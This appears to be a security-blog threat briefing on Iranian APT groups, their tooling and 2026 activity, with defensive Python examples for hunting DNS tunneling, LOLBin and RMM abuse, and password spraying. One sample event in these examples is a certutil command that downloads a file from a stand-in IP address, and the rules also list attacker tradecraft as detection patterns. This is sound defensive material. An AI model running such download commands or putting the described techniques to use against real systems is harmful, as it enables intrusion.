category threat
published March 2026
14 min read

Iranian APT Landscape 2026: Groups, Affiliations, and the Current Threat Picture

Iran's cyber program has never been a single coordinated machine — it's a distributed ecosystem of state-directed APT groups, intelligence agency proxies, hacktivist fronts, and criminal actors operating under varying degrees of state oversight. In early 2026, that ecosystem entered its most operationally active period in years, reshaped by both internal political instability and the most significant kinetic military escalation in the region's modern history.

Understanding the Iranian APT landscape requires understanding its institutional structure. Two primary intelligence organs drive the majority of documented state-directed cyber operations: the Islamic Revolutionary Guard Corps (IRGC), Iran's ideologically oriented paramilitary force, and the Ministry of Intelligence and Security (MOIS), which handles domestic surveillance and foreign intelligence operations. Each sponsors and directs its own cluster of APT groups, with different operational remits, targeting priorities, and technical profiles. Below these sit a third tier — hacktivist fronts, criminal actors, and proxy groups — that carry out plausibly deniable operations aligned with state interests.

Warning: On February 28, 2026, the United States and Israel launched coordinated military operations against Iran (designated Operation Epic Fury and Operation Roaring Lion respectively), triggering an immediate and ongoing multi-vector cyber retaliation campaign. Iran's national internet connectivity dropped to between 1% and 4% following the strikes, temporarily constraining state cyber operations — but Iranian APT cells operating outside the country and groups with pre-positioned access continued to conduct operations with tactical autonomy. As of this writing, the conflict and its associated cyber campaign remain active. This analysis reflects the threat picture as understood in late March 2026.

The Institutional Structure

The IRGC sponsors groups primarily oriented toward offensive capability, destructive operations, and regional power projection. Major IRGC-affiliated clusters include APT33, APT35, APT42, Fox Kitten (also known as Pioneer Kitten or Lemon Sandstorm), CyberAv3ngers, Cotton Sandstorm (Emennet Pasargad), and Void Manticore. These groups demonstrate a higher tolerance for destructive operations and more aggressive targeting of critical infrastructure, consistent with the IRGC's broader mandate.

MOIS sponsors groups oriented more toward intelligence collection, credential theft, and persistent access — though the line between espionage and disruption blurs in crisis periods. Major MOIS-affiliated clusters include OilRig (APT34), MuddyWater (Seedworm, Static Kitten), and various sub-components. MOIS's operational remit includes both foreign operations and domestic surveillance of dissidents abroad, and several recent campaigns have combined both objectives.

At the proxy and hacktivist tier, groups like Handala Hack, APT Iran, and a constellation of smaller collectives carry out operations that serve Iranian state interests while maintaining a degree of deniability. These groups typically conduct DDoS attacks, website defacements, data exfiltration, and hack-and-leak operations, and often overstate the impact of their claimed operations. The hacktivist tier surged dramatically following the February 28, 2026 strikes: security researchers tracked over 60 active pro-Iranian threat groups, generating more than 600 distinct cyberattack claims across Telegram channels within the first two weeks of conflict.

OilRig / APT34 (MOIS)

OilRig, also tracked as APT34, Helix Kitten, Hazel Sandstorm, Earth Simnavaz, and EUROPIUM, is one of Iran's longest-running and most technically sophisticated espionage operations. Active since at least 2014 under MOIS direction, the group targets energy, finance, government, chemical, and telecommunications sectors with a geographic focus on the Middle East, the United States, Europe, India, and Iraq. OilRig's operational philosophy is intelligence-first: long-term access development, credential harvesting, and network familiarity that can support either sustained collection or rapid disruptive escalation when directed.

OilRig's tooling is modular and continuously evolving. The group is known for custom backdoors including Helminth, QUADAGENT, and the Exchange-targeting implants STEALHOOK and PowerExchange — the latter using Exchange servers as both a credential store and an exfiltration channel, a technique that blends into legitimate mail traffic and resists conventional detection. DNS tunneling for command-and-control is a persistent signature, enabling C2 communications that survive many network filtering controls. OilRig also demonstrates consistent supply chain awareness: the group has targeted managed service providers and IT vendors to leverage the trust relationships between organizations and their suppliers as access vectors to downstream targets.
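DNS tunneling of the kind described above is easier to hunt statistically than by signature, because the encoded subdomains change on every query while the zone-level shape stays constant. The detector below is an added example written for this briefing, not OilRig tooling or any vendor's rule; it assumes a simplified resolver log format (timestamp, client, query type, name) and a naive "last two labels" zone split, and every log line and domain name in it is constructed.

```python
"""Heuristic hunt for DNS-tunneling style query patterns (added example).
Input: a constructed, simplified resolver log, one query per line:
    <timestamp> <client_ip> <qtype> <qname>
Zones are approximated as the last two labels (no public-suffix list)."""
import math
from collections import defaultdict

# Constructed sample: example-cdn-sync.test shows tunnel-like traffic (one
# client, every name unique, long high-entropy labels, TXT lookups); the other
# zones look like ordinary browsing and mail.
SAMPLE_DNS_LOG = """\
2026-03-10T09:00:01 10.0.4.21 TXT 6a9f3b1c0d2e4f5a6b7c.8d9e0f1a2b3c4d5e.upd.example-cdn-sync.test
2026-03-10T09:00:03 10.0.4.21 TXT f0e1d2c3b4a596877869.5a4b3c2d1e0f9a8b.upd.example-cdn-sync.test
2026-03-10T09:00:05 10.0.4.21 TXT 1b3d5f7a9c0e2468ace1.3579bdf02468ace1.upd.example-cdn-sync.test
2026-03-10T09:00:07 10.0.4.21 TXT c4d2e0f8a6b4c2d0e8f6.a4b2c0d8e6f4a2b0.upd.example-cdn-sync.test
2026-03-10T09:00:09 10.0.4.21 TXT 7e8f9a0b1c2d3e4f5a6b.7c8d9e0f1a2b3c4d.upd.example-cdn-sync.test
2026-03-10T09:00:11 10.0.4.21 TXT 9d8c7b6a5f4e3d2c1b0a.f9e8d7c6b5a49382.upd.example-cdn-sync.test
2026-03-10T09:00:13 10.0.4.21 TXT 2a4c6e8b0d1f3a5c7e9b.4d6f8a0c2e4b6d8f.upd.example-cdn-sync.test
2026-03-10T09:00:02 10.0.4.22 A www.example-news.test
2026-03-10T09:00:02 10.0.4.22 A static.example-news.test
2026-03-10T09:00:04 10.0.4.22 A img.example-news.test
2026-03-10T09:00:06 10.0.4.25 A api.example-news.test
2026-03-10T09:00:08 10.0.4.25 A www.example-news.test
2026-03-10T09:00:10 10.0.4.22 A cdn.example-news.test
2026-03-10T09:00:12 10.0.4.23 A mail.example-corp.test
2026-03-10T09:00:14 10.0.4.23 MX example-corp.test
2026-03-10T09:00:15 10.0.4.23 A vpn.example-corp.test
"""

def shannon_entropy(text):
    """Bits per character; encoded payload labels score near log2(alphabet size)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def split_zone(qname):
    """Return (zone, subdomain), treating the last two labels as the zone."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def parse_log(text):
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            events.append({"client": parts[1], "qtype": parts[2].upper(), "qname": parts[3]})
    return events

def profile_zones(events):
    """Aggregate per-zone features that separate tunnels from ordinary lookups."""
    acc = defaultdict(lambda: {"q": 0, "names": set(), "clients": set(),
                               "txt": 0, "sub_len": 0, "entropy": 0.0})
    for ev in events:
        zone, sub = split_zone(ev["qname"])
        a = acc[zone]
        a["q"] += 1
        a["names"].add(ev["qname"])
        a["clients"].add(ev["client"])
        a["txt"] += ev["qtype"] == "TXT"
        a["sub_len"] += len(sub)
        a["entropy"] += shannon_entropy(sub.replace(".", ""))
    return {zone: {"queries": a["q"],
                   "unique_ratio": len(a["names"]) / a["q"],
                   "clients": len(a["clients"]),
                   "txt_ratio": a["txt"] / a["q"],
                   "avg_sub_len": a["sub_len"] / a["q"],
                   "avg_entropy": a["entropy"] / a["q"]}
            for zone, a in acc.items()}

def flag_tunnel_candidates(profiles, min_queries=5, min_unique_ratio=0.8,
                           min_sub_len=30, min_entropy=3.0, min_txt_ratio=0.5):
    """Zones worth review: mostly unique names that are long and random looking,
    or that are mostly TXT lookups. The thresholds are tuning knobs, not truths."""
    flagged = []
    for zone, f in profiles.items():
        if f["queries"] < min_queries or f["unique_ratio"] < min_unique_ratio:
            continue
        long_random = f["avg_sub_len"] >= min_sub_len and f["avg_entropy"] >= min_entropy
        if long_random or f["txt_ratio"] >= min_txt_ratio:
            flagged.append(zone)
    return sorted(flagged)

if __name__ == "__main__":
    for zone in flag_tunnel_candidates(profile_zones(parse_log(SAMPLE_DNS_LOG))):
        print("review:", zone)
```

On real resolver logs, baseline the thresholds per environment first: CDNs, telemetry SDKs and some anti-spam services legitimately generate long unique labels and will need allowlisting.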

Infrastructure analysis published in late 2024 and early 2025 revealed a pre-operational staging effort in which OilRig registered domains impersonating an Iraqi academic institution and fabricated UK technology companies, with consistent SSH key reuse across hosted servers and systematic domain registration designed to support future credential harvesting campaigns. This kind of patient, long-horizon infrastructure development — months before any malware deployment — underscores OilRig's disciplined operational posture. In 2025, confirmed targeting extended to U.S. manufacturing and transportation organizations, and the group maintains assessed long-term access to financial and aviation networks in the U.S. and Gulf states.

MuddyWater / Seedworm (MOIS)

MuddyWater — tracked under aliases including Seedworm, Static Kitten, Mango Sandstorm, TA450, and TEMP.Zagros — is arguably the most operationally active Iranian APT group in the current period. A formal subordinate element within MOIS, the group has been conducting cyber espionage operations since at least 2017, targeting telecommunications, government, defense, oil and gas, and financial sectors across the Middle East, Europe, and North America.

MuddyWater's tradecraft is distinctive for its consistent reliance on PowerShell across every stage of the attack chain, combined with aggressive abuse of legitimate Remote Monitoring and Management (RMM) tools — cycling between platforms like ScreenConnect, AnyDesk, and SimpleHelp — to maintain post-compromise access in ways that blend with normal IT operations. The group delivers initial access through spear-phishing using both custom campaigns and compromised email accounts, and exploits known vulnerabilities in VPN appliances and public-facing applications for network-level entry.

The group's custom C2 framework has evolved through multiple generations: POWERSTATS was followed by MuddyC3, then PhonyC2, MuddyC2Go, and DarkBeatC2. The January 2026 campaign designated Operation Olalampo introduced further novel tooling: a Rust-based backdoor called CHAR using a Telegram bot as C2, and evidence — including the Deno JavaScript runtime in the Dindoor backdoor — that the group is actively diversifying its malware development across Python, C#, Go, Rust, and JavaScript to complicate detection. Researchers identified indicators suggesting AI-assisted malware development in the Operation Olalampo samples, consistent with the broader Iranian adoption of AI tooling documented in 2025 and 2026.

Critical: MuddyWater's activity on U.S. bank, airport, nonprofit, and defense-sector software company networks — deploying the previously undocumented Dindoor backdoor — began in early February 2026, weeks before the February 28 strikes. This is pre-positioning, not reaction: the group established persistent footholds in high-value U.S. targets ahead of a triggering geopolitical event. Organizations in financial services, aviation, and defense-adjacent sectors should treat MuddyWater-linked indicators with urgency and assume that pre-positioned access may currently exist in their environments.

MuddyWater has demonstrated a willingness to act as an initial access broker, with documented instances of the group establishing network footholds and then handing operations to other Iranian APT clusters — including Lyceum, a subgroup of OilRig — for deeper exploitation. This inter-group handoff reflects a coordinated division of labor within the Iranian cyber ecosystem rather than isolated, independent operations.

APT42 / Charming Kitten (IRGC)

APT42 — also tracked as Charming Kitten, Mint Sandstorm, and with significant overlap with APT35 — operates on behalf of the IRGC's counterintelligence division, specifically a unit designated IRGC-IO Unit 1500. The group's tradecraft is centered on social engineering and credential harvesting rather than heavy technical exploitation. APT42 cultivates sustained personal relationships with high-value targets — journalists, academics, policy figures, NGO staff, dissidents, and activists — over weeks or months before attempting account compromise or device access.

The group's toolkit has matured significantly into 2026. A backdoor family documented in late 2025 and early 2026 leverages legitimate cloud platforms — Cloudflare Workers, Firebase, OneDrive, and various hosting services — to blend malicious traffic with normal web activity. Execution uses native Windows utilities including PowerShell, Rundll32, and the Windows Command Shell, with persistence via registry run keys. Capabilities include keylogging, screen capture, browser credential and session cookie theft, email collection, and comprehensive system reconnaissance, enabling deep surveillance before any exfiltration. MFA token interception through credential harvesting kits that intercept authentication codes in real time is a documented APT42 capability, enabling account takeover despite MFA enrollment.

A significant leak of internal APT42 operational records was posted to GitHub in September and October 2025 by an anonymous collective called KittenBusters. The leaked materials exposed structured spreadsheets tracking domain registrations, European VPS hosting, and cryptocurrency payments, and confirmed direct infrastructure and administrative overlap with the Moses Staff operation — formally connecting what had sometimes been treated as separate personas into a single coordinated state-directed effort. The records identified Abbas Rahrovi (also known as Abbas Hosseini) as the operation's leader and alleged management through a network of front companies.

In January 2026, a campaign attributed to APT42 (operating under the designation RedKitten in this campaign) targeted Iranian protesters, human rights NGOs, and activists, using weaponized Excel files disguised as lists of casualties from the December 2025 Dey 1404 protests — a period of significant civil unrest and government crackdown in Iran. Malware delivered through these lures used GitHub, Google Drive, and Telegram bots for command-and-control, consistent with APT42's pattern of abusing trusted cloud infrastructure.

APT33 / Elfin (IRGC)

APT33, also tracked as Elfin, Peach Sandstorm, and Refined Kitten, serves as the IRGC's primary destructive arm. Active since at least 2013, the group focuses on aerospace, defense, satellite, oil and gas, energy, and petrochemical sectors, with primary geographic focus on the United States, Saudi Arabia, UAE, South Korea, and Western Europe. APT33 has demonstrated the strongest destructive mandate within the Iranian APT ecosystem and was responsible for the deployment of the Shamoon disk-wiping malware in 2017 and 2018 campaigns against Saudi Arabian energy infrastructure.

Since 2023, APT33's primary initial access method has shifted toward password spraying against Microsoft 365 and Entra ID at scale, using go-http-client through TOR exit nodes. This approach is notable for its patience and scale — targeting organizations across entire sectors with credential stuffing and brute force rather than bespoke phishing, and accepting lower per-target success rates in exchange for volume. Post-compromise activity includes Kerberoasting and AS-REP Roasting for credential escalation. In the current conflict period, APT33 is deploying the Tickler and SHAPESHIFT wiper malware families against aerospace and petrochemical targets in the U.S. and Saudi Arabia, with reported intent to paralyze production infrastructure.

Fox Kitten / Pioneer Kitten (IRGC)

Fox Kitten — tracked under aliases including Pioneer Kitten, Lemon Sandstorm, and Parisite — has operated since approximately 2017 as a specialized initial access broker and VPN exploitation unit within the IRGC ecosystem. The group's defining characteristic is aggressive exploitation of VPN appliances and network perimeter devices: Fortinet, Citrix, Pulse Secure, F5, and Palo Alto Networks devices with known vulnerabilities are targeted at scale for network entry, and the group maintains a portfolio of compromised infrastructure that it uses for both its own operations and for access sales to other Iranian APT groups and, in documented cases, ransomware affiliates.

Fox Kitten has collaborated with ransomware operations — including ALPHV and NoEscape — selling access to compromised networks for profit, reflecting the blurring of state-directed espionage and criminal monetization that characterizes Iran's broader approach to cyber operations. The group also targets managed service providers and IT contractors for their one-to-many access value, enabling downstream compromise of multiple client organizations through a single initial foothold. VPN and remote access appliances remain the single highest-priority device category across Iranian APT operations, and Fox Kitten represents the most focused and technically mature capability in this area.

CyberAv3ngers and Cotton Sandstorm (IRGC)

CyberAv3ngers is an IRGC-affiliated group that has sustained a focused campaign against operational technology (OT) and industrial control systems (ICS), particularly targeting water utilities, fuel management systems, and energy infrastructure in the United States and Israel. The group developed and deployed the IOControl malware family against OT devices — including controllers used in water treatment facilities and fuel management systems — triggering a CISA advisory and a U.S. Department of State Rewards for Justice offer of up to $10 million for attribution information. The group's willingness to target civilian water and fuel infrastructure reflects a threshold for physical-world disruption that many other Iranian groups have historically avoided.

Cotton Sandstorm, also known as Emennet Pasargad and Haywire Kitten, is a MOIS-linked actor that specializes in cyber-enabled influence operations — blending reconnaissance and intrusion with information operations designed to shape perception, amplify social discord, and intimidate perceived opponents of the Iranian regime. The group has targeted media organizations, social media platforms, and individuals in Israel, the United States, France, and Sweden. Its operations increasingly integrate genuine data theft with fabricated or manipulated content, complicating attribution and response.

Handala and the Hacktivist Tier

Handala Hack occupies a unique position in the Iranian cyber ecosystem: formally assessed as linked to MOIS rather than an independent hacktivist group, but operating with the public-facing posture of a hacktivist persona. The group blends data exfiltration with psychological operations and physical threat escalation, targeting Israeli political, defense, and healthcare organizations and, increasingly, Iranian diaspora activists and journalists in Western countries.

Handala's activity in the period leading to and following February 2026 has been particularly aggressive. In December 2025 the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff — though analysis suggested the breach may have been limited to Telegram accounts rather than full device access. In February 2026, the group claimed a breach of one of Israel's largest healthcare networks. In March 2026, Handala orchestrated a destructive attack against U.S. medical device company Stryker using Microsoft Intune as a delivery mechanism for a wiper — a notable escalation in both geographic targeting and destructive capability. The group has also issued direct death threats to Iranian-American and Iranian-Canadian influencers, claiming to have shared their home addresses with physical operatives.

Note: Periods of reduced public blog activity from Handala historically correlate with active operational tempo rather than dormancy. The group has shown markedly reduced public output since January 2026 — a pattern that, based on precedent, suggests ongoing campaign execution rather than inactivity. Organizations in Israeli, U.S., and diaspora-adjacent sectors should not interpret Handala's reduced public presence as reduced operational risk.

The broader hacktivist tier — including groups like APT Iran, Siege Goat, and dozens of smaller collectives — primarily contributes DDoS campaigns, defacements, and claimed data leaks of variable credibility. A large share of hacktivist claims overstate actual impact, and many claimed breaches consist of recycled or fabricated data rather than genuine exfiltration. The operational significance of this tier lies less in individual impacts and more in the aggregate burden it imposes on defenders and the information environment it creates around genuine state-directed operations.

Cross-Cutting TTPs and Shared Infrastructure Patterns

Despite operating under different institutional sponsors with different mandates, Iranian APT groups share a recognizable set of tactics that reflect common training, tooling libraries, and operational culture. Understanding these cross-cutting patterns is more useful for defenders than tracking individual groups, because many campaigns involve infrastructure and tooling shared across clusters.

VPN and remote access appliances are the single highest-priority initial access vector across the entire Iranian APT ecosystem. Fortinet, Citrix, Ivanti, F5, and Palo Alto Networks devices with known vulnerabilities — particularly those on the CISA Known Exploited Vulnerabilities list — are exploited rapidly and consistently. Organizations with unpatched perimeter devices face significantly elevated risk regardless of which specific Iranian group is targeting them. CISA KEV patch compliance is the single highest-leverage defensive action for organizations within the Iranian targeting envelope.

PowerShell is the execution engine of choice across the ecosystem, appearing in MuddyWater, OilRig, APT33, and APT42 campaigns. Living-off-the-land binary abuse — using native Windows utilities including mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe — is standard practice. This approach limits the footprint of distinctive malware on disk and makes behavioral detection rather than signature detection necessary.
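Because this tradecraft leans on signed system binaries and sanctioned remote-support software rather than bespoke malware, the useful telemetry is process-creation context: which parent spawned which image, with what arguments, from where. The rules below are an added example written for this briefing (not any vendor's detection content) over constructed Sysmon-style events; they also cover the RMM-cycling pattern described for MuddyWater above. The RMM name substrings are illustrative and the single-tool allowlist is an assumption standing in for whatever remote-support product an organization has actually approved.

```python
"""Process-creation hunting rules for LOLBin use, Office-spawned script hosts
and unapproved remote-management tools (added example).
Events are constructed, Sysmon-style records; RMM substrings are illustrative
and APPROVED_RMM is an assumption about the organization's sanctioned tool."""
import re
from pathlib import PureWindowsPath

LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RMM_MARKERS = ("screenconnect", "anydesk", "simplehelp")  # illustrative image-name substrings
APPROVED_RMM = ("screenconnect",)                          # assumption: the one sanctioned tool
URL_RE = re.compile(r"https?://", re.I)
# Locations any interactive user can write to; a DLL loaded from here by a
# system binary deserves a look even when the binary itself is signed.
USER_WRITABLE_RE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|windows\\temp|programdata)\\", re.I)

def evaluate(ev):
    """Return the rule ids an event trips; an empty list means nothing to review."""
    image = PureWindowsPath(ev["image"]).name.lower()
    parent = PureWindowsPath(ev["parent_image"]).name.lower()
    cmd = ev["cmdline"]
    hits = []
    if image in LOLBINS and URL_RE.search(cmd):
        hits.append("LOLBIN_WITH_URL")               # system binary reaching out to the web
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("OFFICE_SPAWNED_SCRIPT_HOST")    # a document handing off to a script engine
    if image in {"rundll32.exe", "regsvr32.exe"} and USER_WRITABLE_RE.search(cmd):
        hits.append("DLL_FROM_USER_WRITABLE_PATH")   # module staged outside Program Files/System32
    if any(m in image for m in RMM_MARKERS) and not any(ok in image for ok in APPROVED_RMM):
        hits.append("UNAPPROVED_RMM")                # a second remote-support tool on the host
    return hits

def hunt(events):
    """Map event id -> triggered rule ids, keeping only events with findings."""
    findings = {}
    for ev in events:
        rules = evaluate(ev)
        if rules:
            findings[ev["id"]] = rules
    return findings

# Constructed sample events (users, paths and addresses are made up).
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\jdoe", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\jdoe\Documents\agenda.docx"'},
    {"id": 2, "user": "CORP\\jdoe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\jdoe\AppData\Local\Temp\report.ps1"},
    {"id": 3, "user": "CORP\\jdoe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -f https://203.0.113.10/update.txt C:\Users\Public\update.txt"},
    {"id": 4, "user": "CORP\\jdoe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\jdoe\AppData\Roaming\update\helper.dll,Start"},
    {"id": 5, "user": "NT AUTHORITY\\SYSTEM", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "cmdline": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service'},
    {"id": 6, "user": "NT AUTHORITY\\SYSTEM", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmdline": r'"ScreenConnect.ClientService.exe"'},
    {"id": 7, "user": "CORP\\jdoe", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, rules)
```

Events 1, 6 and 7 are the deliberate negatives: an ordinary Office launch, the approved RMM service, and a rundll32 invocation loading a system DLL from System32.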

Legitimate cloud platforms — Cloudflare Workers, Firebase, OneDrive, GitHub, Google Drive, Telegram — are consistently abused for C2 communications across multiple groups, exploiting the difficulty of blocking traffic to widely used services. Telegram in particular has become a preferred C2 channel, appearing in MuddyWater's Operation Olalampo (CHAR backdoor), APT42's RedKitten campaign, and numerous hacktivist coordination channels.

Password spraying against cloud identity platforms (Microsoft 365, Entra ID, Okta) using automation routed through TOR exit nodes is documented across APT33 and other groups. The technique is patient and low-noise — it generates failed authentication events but at volumes that blend with legitimate login noise unless specific detection thresholds are configured. Disabling legacy authentication protocols and enforcing phishing-resistant MFA on all externally facing identity services directly degrades this attack vector.
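The detection-threshold point is the crux, for the APT33 tradecraft described earlier as much as here: a per-account lockout rule never fires on a spray, while a per-source rule keyed on distinct accounts does. The following is an added example written for this briefing, not a Microsoft, Okta or vendor query; it assumes a simplified, constructed sign-in event schema (ts, user, ip, result) rather than the real Entra ID sign-in log fields, and the addresses and accounts are made up.

```python
"""Password-spray detection over sign-in events (added example).
The schema (ts, user, ip, result) is a simplified stand-in for a real identity
provider's sign-in log; every event below is constructed, not captured."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

def build_sample_events():
    """Constructed sample: one spray source, ordinary typo noise, one brute force."""
    base = datetime(2026, 3, 5, 2, 0, tzinfo=timezone.utc)

    def stamp(**delta):
        return (base + timedelta(**delta)).isoformat()

    spray_ip = "198.51.100.23"  # documentation-range address standing in for a TOR exit
    users = [f"user{n:02d}@corp.example" for n in range(1, 13)]
    events = []
    for i, user in enumerate(users):  # two guesses per account: below any lockout threshold
        for attempt in range(2):
            events.append({"ts": stamp(seconds=90 * i + 40 * attempt), "user": user,
                           "ip": spray_ip, "result": "failure"})
    # one guess landed: the spray source now authenticates as a real user
    events.append({"ts": stamp(minutes=25), "user": users[4], "ip": spray_ip, "result": "success"})
    for n, ip in enumerate(["203.0.113.5", "203.0.113.9", "192.0.2.44"]):  # mistyped passwords
        user = f"staff{n}@corp.example"
        events.append({"ts": stamp(minutes=5 + n), "user": user, "ip": ip, "result": "failure"})
        events.append({"ts": stamp(minutes=6 + n), "user": user, "ip": ip, "result": "success"})
    for k in range(8):  # classic brute force: one account, many failures
        events.append({"ts": stamp(minutes=10, seconds=5 * k), "user": "admin@corp.example",
                       "ip": "192.0.2.200", "result": "failure"})
    return sorted(events, key=lambda e: e["ts"])

def per_user_lockout_hits(events, threshold=5):
    """The account-centric rule most tenants already have. It catches the brute
    force but is blind to the spray, which stays under the threshold per account."""
    fails = Counter(e["user"] for e in events if e["result"] == "failure")
    return sorted(u for u, c in fails.items() if c >= threshold)

def detect_spray(events, window_minutes=60, min_users=8, max_per_user=3):
    """Source-centric rule: one IP failing against many distinct accounts with few
    attempts each inside a window. Fixed windows keep the example short; a
    production rule would slide the window and also key on ASN or exit-node lists."""
    buckets = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        buckets[(ev["ip"], int(ts.timestamp()) // (window_minutes * 60))].append(ev)
    findings = []
    for (ip, _), evs in buckets.items():
        failures = [e for e in evs if e["result"] == "failure"]
        per_user = Counter(e["user"] for e in failures)
        if len(per_user) < min_users or max(per_user.values()) > max_per_user:
            continue
        last_failure = max(e["ts"] for e in failures)
        # a success from the same source after the spray is the highest-priority signal
        landed = sorted(e["user"] for e in evs
                        if e["result"] == "success" and e["ts"] > last_failure)
        findings.append({"ip": ip, "distinct_users": len(per_user), "failures": len(failures),
                         "max_per_user": max(per_user.values()), "successes_after_spray": landed})
    return findings

if __name__ == "__main__":
    events = build_sample_events()
    print("per-user lockout would flag:", per_user_lockout_hits(events))
    for finding in detect_spray(events):
        print("spray:", finding)
```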

Supply chain and MSP targeting runs through multiple groups as a force multiplier. Fox Kitten and OilRig both demonstrate consistent interest in IT service providers and managed service companies — organizations whose trusted access to multiple downstream clients makes a single compromise disproportionately valuable. Organizations that are not direct targets of Iranian APT groups may nonetheless be targeted as vectors into organizations that are.

The 2026 Geopolitical Context and Its Implications

The February 28, 2026 strikes and the ongoing conflict have accelerated and intensified Iranian cyber activity in ways that directly affect organizations with no direct connection to the Middle East conflict. Several dimensions of this shift are worth highlighting for defenders.

First, the pre-positioning dimension: MuddyWater's activity on U.S. financial, aviation, and defense networks beginning in early February 2026 — before the kinetic strikes — confirms that Iranian APT groups maintain persistent access to high-value targets as a strategic reserve. This access can be activated for collection or disruption when directed. Organizations that have not recently hunted for Iranian APT indicators in their environments cannot assume clean bills of health from the absence of active incident signals.

Second, the targeting expansion: Researchers have documented that organizations with no direct connection to Israel, the United States, or the conflict are being targeted opportunistically. Financial services firms with Middle Eastern operations or correspondent relationships, aerospace and defense supply chain participants, healthcare organizations, cloud infrastructure providers, and telecommunications companies face elevated risk across a significantly broadened geographic scope — including the E.U., Canada, Australia, and the Gulf states regardless of those countries' direct involvement in the conflict.

Third, the sanctions dimension: Organizations that pay ransoms or otherwise transfer value to Iranian-affiliated groups may face sanctions exposure under U.S. law (IEEPA, TWEA) and equivalent legislation in other jurisdictions. The intersection of criminal ransomware operations and state-directed cyber activity means that the ransomware group receiving payment may be a sanctioned entity, making the payment itself a potential legal liability for the victim organization regardless of intent.

Defensive Priorities for Organizations in the Targeting Envelope

  1. Patch all CISA KEV vulnerabilities on perimeter devices immediately. VPN and remote access appliances — particularly Fortinet, Citrix, Ivanti, F5, and Palo Alto Networks products — are the primary initial access vector across the Iranian APT ecosystem. Unpatched perimeter devices are effectively open invitations. KEV compliance is the baseline, not a stretch goal.
  2. Disable legacy authentication protocols and enforce phishing-resistant MFA on all externally facing services. Password spraying via TOR against Microsoft 365 and Entra ID is an active, ongoing threat. Disabling basic authentication, enforcing Conditional Access policies requiring managed and compliant devices, and deploying FIDO2/WebAuthn for privileged access all directly reduce exposure to this vector.
  3. Hunt for MuddyWater and OilRig indicators proactively. Given documented pre-positioning in U.S. financial, aviation, and defense networks, threat hunting for known Iranian APT indicators should be an immediate priority — not a response to an active incident. Key hunting targets include the Dindoor and CHAR backdoor families, unusual DLL sideloading activity, Rclone usage for data exfiltration to cloud storage, and unexpected RMM tool installations.
  4. Monitor for cloud platform C2 abuse. Iranian APT groups consistently abuse Cloudflare Workers, Firebase, OneDrive, GitHub, Google Drive, and Telegram for command-and-control. Traffic to these services should not be automatically trusted. User and entity behavior analytics (UEBA) can identify anomalous patterns of access to cloud services from corporate endpoints that may indicate C2 activity.
  5. Audit IT service provider and MSP access. Fox Kitten and OilRig actively target IT vendors and MSPs as supply chain vectors. Organizations should audit what access their IT service providers have to their environments, ensure that provider access is governed by the same MFA and access control standards applied internally, and review network segmentation between provider-managed systems and sensitive internal resources.
  6. Ensure backup infrastructure is isolated and protected against wiper deployment. APT33, Handala, and Cotton Sandstorm have all demonstrated destructive wiper capability. Backups should be stored on infrastructure that is not accessible from the same credential set as production systems, ideally with offline or immutable copies that cannot be encrypted or wiped through a compromised domain account. Recovery time objectives should be tested against realistic wiper scenarios, not just ransomware scenarios.
  7. Treat internal communications as potentially compromised in active incidents. Both MuddyWater and Scattered Spider (operating against Iranian-adjacent targets) have demonstrated surveillance of incident response communications. Sensitive incident response activities should be conducted through out-of-band channels — personal phones, offline secure messaging apps, external email accounts — not through corporate systems that may already be monitored.

Key Takeaways

  1. The Iranian APT ecosystem is not monolithic. Two primary institutional sponsors — the IRGC and MOIS — direct distinct clusters of groups with different mandates, targeting priorities, and technical profiles. Understanding which group is operating in a given incident can indicate whether the objective is espionage, disruption, influence operations, or some combination, which shapes both the immediate response and longer-term risk assessment.
  2. Pre-positioning is documented and ongoing. MuddyWater's establishment of persistent footholds in U.S. financial, aviation, and defense networks weeks before the February 2026 strikes confirms that Iranian APT groups maintain strategic access reserves. Organizations cannot assume absence of compromise from absence of visible activity.
  3. VPN appliances are the primary initial access vector across the entire ecosystem. Patch compliance against CISA KEV vulnerabilities on perimeter devices is the single highest-leverage defensive action available to organizations in the Iranian targeting envelope, regardless of sector or geography.
  4. The hacktivist tier amplifies volume but not necessarily impact. The surge to 60+ active pro-Iranian groups generates significant noise and imposes defender burden, but the majority of hacktivist claims overstate actual impact. Distinguishing hacktivist activity from state-directed APT operations is important for calibrating response priorities.
